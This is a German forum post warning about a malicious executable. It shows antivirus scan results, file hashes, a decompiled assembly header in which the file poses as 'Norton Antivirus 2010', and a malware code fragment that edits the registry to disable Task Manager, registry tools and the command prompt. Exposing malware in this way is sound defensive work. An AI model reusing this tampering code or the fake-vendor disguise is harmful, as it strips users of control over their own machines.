Ich hab mir mal die Mühe gemacht
Antivirus results
AhnLab-V3 - 2011.09.04.01 - 2011.09.05 -
Dropper/Win32.Agent
AntiVir - 7.11.14.98 - 2011.09.05 -
TR/Dropper.Gen
Antiy-AVL - 2.0.3.7 - 2011.09.05 - -
Avast - 4.8.1351.0 - 2011.09.05 -
MSIL:Inject-P [Trj]
Avast5 - 5.0.677.0 - 2011.09.05 -
MSIL:Inject-P [Trj]
AVG - 10.0.0.1190 - 2011.09.05 -
Dropper.Generic2.CLQR
BitDefender - 7.2 - 2011.09.05 -
Worm.Generic.295113
ByteHero - 1.0.0.1 - 2011.08.22 - -
CAT-QuickHeal - 11.00 - 2011.09.05 - -
ClamAV - 0.97.0.0 - 2011.09.05 -
Trojan.MSIL.Agent-7
Commtouch - 5.3.2.6 - 2011.09.04 - -
Comodo - 9997 - 2011.09.05 - -
DrWeb - 5.0.2.03300 - 2011.09.05 -
Trojan.DownLoad2.19164
Emsisoft - 5.1.0.11 - 2011.09.05 -
Virus.Win32.BeeInject!IK
eSafe - 7.0.17.0 - 2011.09.04 - -
eTrust-Vet - 36.1.8540 - 2011.09.05 - -
F-Prot - 4.6.2.117 - 2011.09.04 - -
F-Secure - 9.0.16440.0 - 2011.09.05 -
Worm.Generic.295113
Fortinet - 4.3.370.0 - 2011.09.05 -
MSIL/KeyLogger.AWB!tr
GData - 22 - 2011.09.05 -
Worm.Generic.295113
Ikarus - T3.1.1.107.0 - 2011.09.05 -
Virus.Win32.BeeInject
Jiangmin - 13.0.900 - 2011.09.05 -
TrojanDropper.MSIL.fbp
K7AntiVirus - 9.111.5090 - 2011.09.05 - -
Kaspersky - 9.0.0.837 - 2011.09.05 -
Trojan-Dropper.MSIL.Agent.nyw
McAfee - 5.400.0.1158 - 2011.09.05 - -
McAfee-GW-Edition - 2010.1D - 2011.09.05 - -
Microsoft - 1.7604 - 2011.09.05 - -
NOD32 - 6437 - 2011.09.05 -
Win32/Small.NJA
Norman - 6.07.11 - 2011.09.05 - -
nProtect - 2011-09-05.01 - 2011.09.05 - -
Panda - 10.0.3.5 - 2011.09.04 -
Generic Trojan
PCTools - 8.0.0.5 - 2011.09.05 - -
Prevx - 3.0 - 2011.09.05 - -
Rising - 23.73.01.03 - 2011.08.30 - -
Sophos - 4.69.0 - 2011.09.05 -
Mal/MSIL-BA
SUPERAntiSpyware - 4.40.0.1006 - 2011.09.04 - -
Symantec - 20111.2.0.82 - 2011.09.05 -
Trojan Horse
TheHacker - 6.7.0.1.290 - 2011.09.03 - -
TrendMicro - 9.500.0.1008 - 2011.09.03 -
TROJ_DROPR.SMH
TrendMicro-HouseCall - 9.500.0.1008 - 2011.09.05 -
TROJ_DROPR.SMH
VBA32 - 3.12.16.4 - 2011.09.05 -
TrojanDropper.MSIL.Agent.nyw
VIPRE - 10379 - 2011.09.05 - -
ViRobot - 2011.9.5.4657 - 2011.09.05 - -
VirusBuster - 14.0.201.0 - 2011.09.05 -
TrojanSpy.Spyeye!gkhDSEQCv00
File info:
MD5: 4b24434578d03043dd15ce3e394ada76
SHA1: b57ec1ed398b9521e55d7e5671b899dc23980130
SHA256: 062309d4e2d3667dc9c417490204848eab788545853d09b279 7a12ace4b600c4
File size: 1011667 bytes
Scan date: 2011-09-05 14:48:46 (UTC)
Vorallem schon der Header der *.exe Datei:
// Assembly S-Norton3, Version 10.2.45.5
[assembly: AssemblyVersion("10.2.45.5")]
[assembly: AssemblyCopyright("Copyright \x00a9 Norton 2010")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyTitle("")]
[assembly: ComVisible(false)]
[assembly: AssemblyCompany("")]
[assembly: AssemblyProduct("Norton Antivirus 2010")]
[assembly: CompilationRelaxations(8)]
[assembly: Guid("c1f82ed6-c037-4aa8-ba31-d31b2144e5a3")]
[assembly: Debuggable(DebuggableAttribute.DebuggingModes.Igno reSymbolStoreSequencePoints | DebuggableAttribute.DebuggingModes.Default)]
[assembly: AssemblyTrademark("Norton Antivirus Software")]
[assembly: RuntimeCompatibility(WrapNonExceptionThrows=true)]
[assembly: AssemblyFileVersion("10.2.46.5")]
(Sarkasmus: ACHTUNG)Und es kann ja gar kein Virus o.ä sein, ich meine wenn sowas schon im Sourcecode steht:
{
MyProject.Computer.Registry.SetValue(@"HKEY_CURREN T_USER\Software\Microsoft\Windows\CurrentVersion\P olicies\System", "DisableTaskMgr", "1", RegistryValueKind.DWord);
}
if (this.nINVLqzzyDahoTf == "true")
{
MyProject.Computer.Registry.SetValue(@"HKEY_CURREN T_USER\Software\Microsoft\Windows\CurrentVersion\P olicies\System", "DisableRegistryTools", "1", RegistryValueKind.DWord);
}
if (this.fuyCtShaKruPrvK == "true")
{
MyProject.Computer.Registry.SetValue(@"HKEY_CURREN T_USER\Software\Policies\Microsoft\Windows\System" , "DisableCMD", "1", RegistryValueKind.DWord);
(Registry, CMD und Taskmanager werden deaktiviert)